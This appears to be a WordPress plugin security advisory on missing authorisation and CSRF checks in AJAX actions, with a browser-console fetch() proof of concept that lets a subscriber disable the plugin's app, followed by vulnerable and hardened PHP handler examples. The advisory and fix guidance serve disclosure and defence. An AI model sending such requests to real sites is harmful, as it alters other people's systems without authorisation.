The plugin does not have authorisation and CSRF checks in some of its AJAX actions, allowing any logged-in user, such as a subscriber, to call them and, for example, disable the app.

Run the command below in the developer console of the web browser while on the blog as any logged-in user, such as a subscriber:

fetch("/wp-admin/admin-ajax.php", {
    "headers": { "content-type": "application/x-www-form-urlencoded" },
    "method": "POST",
    "body": "action=mo_discord_disable_app&app_name=test",
    "credentials": "include"
})
.then(response => response.text())
.then(data => console.log(data));
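The following is an added example, not the plugin's own code, showing what the missing checks look like in a WordPress AJAX handler: a hypothetical handler for the `mo_discord_disable_app` action first in the unprotected shape the advisory describes, then a hardened version with a nonce check (CSRF) and a capability check (authorisation). All function names, option names and the nonce action string are assumptions for illustration; only the AJAX action name and the `app_name` parameter come from the advisory.

```php
<?php
// Added example (not the plugin's code). Hypothetical WordPress AJAX handlers
// for the "mo_discord_disable_app" action. Names other than the action and the
// app_name parameter are assumptions made for illustration.

// --- Vulnerable pattern: no capability check, no nonce check ---------------
// Hooked on wp_ajax_ only, so it needs a login, but every role (subscriber
// included) can reach it, and a cross-site request succeeds because the
// browser attaches the login cookie automatically.
function hypothetical_disable_app_unsafe() {
    $app_name = isset( $_POST['app_name'] )
        ? sanitize_text_field( wp_unslash( $_POST['app_name'] ) )
        : '';
    update_option( 'hypothetical_app_enabled_' . $app_name, false );
    wp_send_json_success( 'App disabled' );
}
// This is how the unsafe handler would have been registered; left unhooked
// here so only the hardened handler below is active.
// add_action( 'wp_ajax_mo_discord_disable_app', 'hypothetical_disable_app_unsafe' );

// --- Hardened pattern ----------------------------------------------------
function hypothetical_disable_app_safe() {
    // 1. CSRF: verify the nonce the admin page embedded in its request.
    //    check_ajax_referer() stops execution with -1 / HTTP 403 when the
    //    "security" field is missing or does not match.
    check_ajax_referer( 'hypothetical_disable_app_nonce', 'security' );

    // 2. Authorisation: only users allowed to manage settings may disable apps.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Insufficient permissions', 403 );
    }

    // 3. Input handling: unslash, sanitise, then validate against an allow-list
    //    of apps the plugin actually knows about (option name is assumed).
    $app_name = isset( $_POST['app_name'] )
        ? sanitize_key( wp_unslash( $_POST['app_name'] ) )
        : '';
    $known_apps = (array) get_option( 'hypothetical_known_apps', array() );
    if ( '' === $app_name || ! in_array( $app_name, $known_apps, true ) ) {
        wp_send_json_error( 'Unknown app', 400 );
    }

    update_option( 'hypothetical_app_enabled_' . $app_name, false );
    wp_send_json_success( 'App disabled' );
}
add_action( 'wp_ajax_mo_discord_disable_app', 'hypothetical_disable_app_safe' );

// The admin page that triggers the action must send the matching nonce, for
// example by passing it to its script with wp_localize_script():
//   array( 'security' => wp_create_nonce( 'hypothetical_disable_app_nonce' ) )
```

With the hardened handler in place, the console request quoted above (no nonce, subscriber session) is rejected before any option is touched: `check_ajax_referer()` answers `-1` with HTTP 403, and a request carrying a valid nonce but coming from a non-administrator gets the JSON error with status 403. Checking for exactly those two responses is a quick way to confirm a fix for this class of issue across a plugin's other AJAX actions.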
Lana Codes
Lana Codes
Yes
2022-09-26 (about 12 months ago)
2022-09-26 (about 12 months ago)
2023-07-24 (about 2 months ago)